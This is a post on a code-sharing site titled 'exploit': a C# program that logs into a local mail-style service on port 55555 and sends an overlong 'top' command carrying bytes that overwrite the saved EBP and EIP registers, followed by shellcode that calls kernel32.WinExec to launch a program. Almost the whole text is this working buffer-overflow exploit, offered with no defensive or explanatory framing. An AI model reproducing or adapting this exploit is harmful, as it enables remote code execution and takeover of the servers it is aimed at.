Code-Bin #629 - exploit

exploit
Posted by: exploit | May 3, 2010 @ 5:42pm

C# Code

using System.Net;
using System.Net.Sockets;
using System;
using System.Numeric;
using System.Collections.Generic;
using System.Globalization;

namespace Exploit {
    class Program {
        static void Main(string[] args) {

IPEndPoint ipep =
                new IPEndPoint(IPAddress.Parse("127.0.0.1"), 55555);
            Socket server = new Socket(AddressFamily.InterNetwork,
                              SocketType.Stream, ProtocolType.Tcp);
            server.Connect(ipep);
            System.Text.ASCIIEncoding encoding = new System.Text.ASCIIEncoding();
            string login = "user apiuser\r\n";
            string passwd = "passwd\r\n";
            string top = "top 1 123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234";
            string end = "\r\n";
            byte[] arrayS = new byte[20];

arrayS = StrToByteArray(login);
            server.Send(arrayS);
            arrayS = StrToByteArray(passwd);
            server.Send(arrayS);
            arrayS = StrToByteArray(top);
            server.Send(arrayS);

//prepis EBP
            String a = "0x01";
            String b = "0x01";
            String c = "0x01";
            String d = "0x01";
            Console.WriteLine();
            byte a1 = StringToByte(a);
            byte b1 = StringToByte(b);
            byte c1 = StringToByte(c);
            byte d1 = StringToByte(d);
            byte[] ahoj = new byte[] { a1, b1, c1, d1 };
            server.Send(ahoj);

//prepis EIP
            a = "0xF8";
            b = "0x03";
            c = "0xFA";
            d = "0x77";
            a1 = StringToByte(a);
            b1 = StringToByte(b);
            c1 = StringToByte(c);
            d1 = StringToByte(d);
            ahoj = new byte[] { a1, b1, c1, d1 };
            server.Send(ahoj);

a = "0x90";
            b = "0x90";
            c = "0x90";
            d = "0x90";
            a1 = StringToByte(a);
            b1 = StringToByte(b);
            c1 = StringToByte(c);
            d1 = StringToByte(d);
            ahoj = new byte[] { a1, b1, c1, d1 };
            server.Send(ahoj);

a = "0xB8";
            b = "0x09";
            c = "0xFA";
            d = "0x12";
            String e = "0x10";
            a1 = StringToByte(a);
            b1 = StringToByte(b);
            c1 = StringToByte(c);
            d1 = StringToByte(d);
            byte e1 = StringToByte(e);
            ahoj = new byte[] { a1, b1, c1, d1, e1 };
            server.Send(ahoj);

a = "0xB9";
            b = "0xFF";
            c = "0xFF";
            d = "0xFF";
            e = "0x80";
            a1 = StringToByte(a);
            b1 = StringToByte(b);
            c1 = StringToByte(c);
            d1 = StringToByte(d);
            e1 = StringToByte(e);
            ahoj = new byte[] { a1, b1, c1, d1, e1 };
            server.Send(ahoj);

a = "0x23";
            b = "0xC1";
            a1 = StringToByte(a);
            b1 = StringToByte(b);
            ahoj = new byte[] { a1, b1};
            server.Send(ahoj);

a = "0xBD";//adresa kernel32.WinExec
            b = "0xFF";
            c = "0x54";
            d = "0xF7";
            e = "0x77";
            a1 = StringToByte(a);
            b1 = StringToByte(b); 
            c1 = StringToByte(c);
            d1 = StringToByte(d);
            e1 = StringToByte(e);
            ahoj = new byte[] { a1, b1, c1, d1, e1 };
            server.Send(ahoj);

a = "0xBE";// adresa kernel32 -> call ebp
            b = "0x7B";
            c = "0x82";
            d = "0xF2";
            e = "0x77";
            a1 = StringToByte(a);
            b1 = StringToByte(b);
            c1 = StringToByte(c);
            d1 = StringToByte(d);
            e1 = StringToByte(e);
            ahoj = new byte[] { a1, b1, c1, d1, e1 };
            server.Send(ahoj);

b = "0xFF"; 
            c = "0xE6";
            a = "0x50";
            a1 = StringToByte(a);
            b1 = StringToByte(b);
            c1 = StringToByte(c);
            ahoj = new byte[] { a1, b1, c1};
            server.Send(ahoj);

String load = "C:\\Program Files\\Bethesda Softworks\\Fallout 3\\FalloutLauncher";

arrayS = StrToByteArray(load);
            server.Send(arrayS);
            Console.Write("Sended: " + encoding.GetString(arrayS));

arrayS = StrToByteArray(end);
            server.Send(arrayS);
            Console.Write("Sended: " + encoding.GetString(arrayS));

server.Close();

}
        public static byte[] StrToByteArray(string str) {
            System.Text.ASCIIEncoding encoding = new System.Text.ASCIIEncoding();
            return encoding.GetBytes(str);
        }
        public static byte StringToByte(String hex) {
            int cislo;
            String mensi = hex.Substring(3);
            String vetsi = hex.Substring(2,1);
            switch (mensi) {
                case "A": { 
                        cislo = 10;
                        break; }
                case "B": { 
                        cislo = 11;
                        break; }
                case "C": { 
                        cislo = 12;
                        break; }
                case "D": { 
                        cislo = 13;
                        break; }
                case "E": { 
                        cislo = 14;
                        break; }
                case "F": { 
                        cislo = 15;
                        break; }
                default:{
                        cislo =  Int32.Parse(mensi);
                        break;}           
            }
            switch (vetsi) {
                case "A": {
                        cislo += 10*16;
                        break;
                    }
                case "B": {
                        cislo += 11*16;
                        break;
                    }
                case "C": {
                        cislo += 12*16;
                        break;
                    }
                case "D": {
                        cislo += 13*16;
                        break;
                    }
                case "E": {
                        cislo += 14*16;
                        break;
                    }
                case "F": {
                        cislo += 15*16;
                        break;
                    }
                default: {
                        cislo += Int32.Parse(vetsi)*16;
                        break;
                    }
            }
            return (byte)cislo;
        }
    }
}

Syntax Highlighting

[Open in new window]

Author Comments

none

Rating

4.58 / 8
208 Votes